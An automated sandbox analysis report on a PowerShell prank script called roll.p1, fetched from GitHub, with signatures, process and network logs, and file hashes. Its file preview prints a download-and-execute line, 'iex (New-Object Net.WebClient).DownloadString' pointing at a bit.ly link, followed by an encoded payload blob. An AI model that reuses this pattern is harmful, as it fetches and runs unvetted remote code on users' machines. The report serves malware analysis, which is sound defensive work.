Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://github.com/fenwikk/rickroll/raw/main/roll.p1

Overview

General Information

Sample URL:https://github.com/fenwikk/rickroll/raw/main/roll.p1
Analysis ID:1633702
Infos:

Detection

Score:48
Range:0 - 100
Confidence:100%

Signatures

Yara detected Powershell download and execute
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 1152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,18210615056389622539,8746742493678263867,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://github.com/fenwikk/rickroll/raw/main/roll.p1" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_59JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: https://raw.githubusercontent.com/youknowedo/rickroll/main/roll.p1HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.6:54122 -> 1.1.1.1:53
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: github.com to https://raw.githubusercontent.com/youknowedo/rickroll/main/roll.p1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /fenwikk/rickroll/raw/main/roll.p1 HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /youknowedo/rickroll/raw/main/roll.p1 HTTP/1.1Host: github.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /youknowedo/rickroll/main/roll.p1 HTTP/1.1Host: raw.githubusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: chromecache_59.3.drString found in binary or memory: http://bit.ly/rRpwSh
    Source: chromecache_59.3.drString found in binary or memory: http://www.leeholmes.com/projects/ps_html5/background.mp3
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54127
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1152_842371641Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1152_842371641Jump to behavior
    Source: classification engineClassification label: mal48.evad.win@24/4@6/4
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,18210615056389622539,8746742493678263867,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://github.com/fenwikk/rickroll/raw/main/roll.p1"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,18210615056389622539,8746742493678263867,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: dropped/chromecache_59, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    File Deletion
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://github.com/fenwikk/rickroll/raw/main/roll.p10%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.leeholmes.com/projects/ps_html5/background.mp30%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    github.com
    140.82.121.4
    truefalse
      high
      raw.githubusercontent.com
      185.199.109.133
      truefalse
        high
        www.google.com
        142.250.185.132
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://github.com/fenwikk/rickroll/raw/main/roll.p1false
            high
            https://github.com/youknowedo/rickroll/raw/main/roll.p1false
              high
              https://raw.githubusercontent.com/youknowedo/rickroll/main/roll.p1false
                high
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.leeholmes.com/projects/ps_html5/background.mp3chromecache_59.3.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://bit.ly/rRpwShchromecache_59.3.drfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.199.109.133
                    raw.githubusercontent.comNetherlands
                    54113FASTLYUSfalse
                    142.250.185.132
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    140.82.121.4
                    github.comUnited States
                    36459GITHUBUSfalse
                    IP
                    192.168.2.6
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1633702
                    Start date and time:2025-03-10 14:14:36 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:browseurl.jbs
                    Sample URL:https://github.com/fenwikk/rickroll/raw/main/roll.p1
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:16
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal48.evad.win@24/4@6/4
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.185.110, 142.250.185.67, 142.250.186.174, 64.233.166.84, 142.250.184.238, 142.250.185.174, 142.250.186.142, 142.250.185.78, 199.232.214.172, 172.217.18.14, 142.250.176.206, 74.125.7.136, 172.217.18.3, 23.60.203.209, 4.175.87.197
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-hp57yns7.gvt1.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, r3.sn-hp57yns7.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: https://github.com/fenwikk/rickroll/raw/main/roll.p1
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (33638)
                    Category:downloaded
                    Size (bytes):37184
                    Entropy (8bit):6.082543533886518
                    Encrypted:false
                    SSDEEP:768:bn/Lc3vSysztkmnHQTtCBzgvQCdBGeNOWnTzXz1qq0mi0rs:nsSfztlncJYGGeMWTzXz1B00g
                    MD5:4BBFD25052CA8D6A85C488B8251CB465
                    SHA1:B8B10447D8109AC976D61E4CFDE0C72ECFBAD0CE
                    SHA-256:04F86359DD56D800E1C9559D6710956F4C33039607BD872F119EB3B129235876
                    SHA-512:D80DC5932F31AF6BB6F8ED3D90E826E81C27B48B456101BB9D11FFDEE18F467F0F65CF6FDEB9E8A8D15E340845F4D3CDEF3FF668BA5F9B4189F3F89FF588370B
                    Malicious:false
                    Reputation:low
                    URL:https://raw.githubusercontent.com/youknowedo/rickroll/main/roll.p1
                    Preview:if($host.Name -ne "ConsoleHost").{. Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''http://bit.ly/rRpwSh'')'. return.}..$data = 'H4sIAAAAAAAEAO29B2AcSZYlJi9tynt/SvVK1+B0oQiAYBMk2JBAEOzBiM3mkuwdaUcjKasqgcplVmVdZhZAzO2dvPfee++999577733ujudTif33/8/XGZkAWz2zkrayZ4hgKrIHz9+fB8/In638zpb5E36Wfp7biUpPR+lP/ZjvyeeH//xH/89f5x/0C9Dz4/rvz/2ex4+0kd+Ofz4k0/MewIC/3zyyScfH9Lz6PDwx3/s95T2I/Pio0O8Ii/5nX/Cb/ivcGN57BsGGfcKnuAVfcn1gtbyAr3ycfwVfklesQ+N4uNPOq+M+D8e/CH+k3af8JtoT80+1p+2l5G05v/jM3mBn48/jr4ywiNIDb1yqDT2X9Fh8D+fdF5BYzct/iv8EX7EXzGd4BWLlyHZx+EL/M7Hn0gX+goTzL3i3vjkYzsY/ONeca39Vyyl5SWlQu8V6evjT7Qffsdy5MeHOlp5xcMLvXzM73Dbj/kfDIbJaSkWIPboUBoyWh8zmvrKobxlGMbh9ejRJwYzxsiMwgB8pETmF/i/kTcY88rH+oq8Frwykp68mWFS8TsOcXnFodV9xcyle8N/ZSTI4ZVDeeHHzSuuE6bYj3sA7MedXjqvuF70gQx0MDv8xBLMUExe0bfwsXTz4zKX4JdPPu73gn91goCG6cYg9uM//nHwiocXXsIcB4ihHesL5jKn+vxXwjf0FXnL9WIHj1eUy0LEftyozd9Te/FeYXViujGY/binC90rShJp+ONWyAxizgJAkN3DL2DSuTH+wc/eK9qaWZhBE0G1i
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (871)
                    Category:downloaded
                    Size (bytes):876
                    Entropy (8bit):5.183784309220293
                    Encrypted:false
                    SSDEEP:24:rhpPMUkEljS3BHslgT1d1uawBAT76cuoBN2t2t2t2t2t2t2tomffffffo:rhpPMUb23KlgJXwBAScuSNYYYYYYYom4
                    MD5:C1200F3968A99F6FC9F4C9D91E9E1975
                    SHA1:2A8EF891B0920B36DB39FF0CECBBD6F0105A9F00
                    SHA-256:66A0BDF94407C0A00DC964423084B126896E75F5B78A42612378F8E0A1795F8B
                    SHA-512:9479C5516E80B565564C8CA2892EFD551F650E235D6731191E8E5A0C87AA474F3E23F73B42FE4C529106DA6F6E8A0A676B2DF4A8D4E3B20BF3A16D667F0AD148
                    Malicious:false
                    Reputation:low
                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                    Preview:)]}'.["",["homeland security tsa","college basketball tournament bracket","robinson r88 helicopter","marvel daredevil born again","monster hunter wilds title update","cat food recalled","tj bailey texas motorplex","quantum supersolid light"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"234765953888936429","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                    No static file info
                    TimestampSource PortDest PortSource IPDest IP
                    Mar 10, 2025 14:15:31.632616997 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:31.944850922 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:32.554091930 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:33.757175922 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:36.164361000 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:40.246922970 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:40.681569099 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:41.134939909 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:41.344799995 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:42.681596041 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:44.549160004 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:44.549276114 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:44.549374104 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:44.549740076 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:44.549773932 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:45.086719990 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:45.323859930 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.323970079 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:45.324095964 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.324202061 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.324253082 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:45.324465990 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.324637890 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.324675083 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:45.324966908 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:45.324981928 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:46.687433004 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:46.690573931 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:46.690599918 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:46.691742897 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:46.691809893 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:46.693244934 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:46.693316936 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:46.746256113 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:46.746292114 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:46.792695045 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:47.490708113 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.491065979 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.491082907 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.492109060 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.492166042 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.493988037 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.494050980 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.494646072 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.494663000 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.541352034 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.571773052 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.572115898 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.572151899 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.573873043 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.573941946 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.574513912 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.574584961 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.620034933 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:47.620106936 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:47.666580915 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.289244890 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.343736887 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.379538059 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.379547119 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.379607916 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.379625082 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.379642010 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.379690886 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.380162954 CET49700443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.380182981 CET44349700140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:48.388149023 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:48.428344011 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:49.901304007 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:15:50.745599031 CET49672443192.168.2.6204.79.197.203
                    Mar 10, 2025 14:15:51.144299984 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:51.197931051 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:51.230299950 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:51.230317116 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:51.230395079 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:51.230437994 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:51.230776072 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:51.233836889 CET49699443192.168.2.6140.82.121.4
                    Mar 10, 2025 14:15:51.233882904 CET44349699140.82.121.4192.168.2.6
                    Mar 10, 2025 14:15:51.242271900 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:51.242321968 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:51.242461920 CET49701443192.168.2.6185.199.109.133
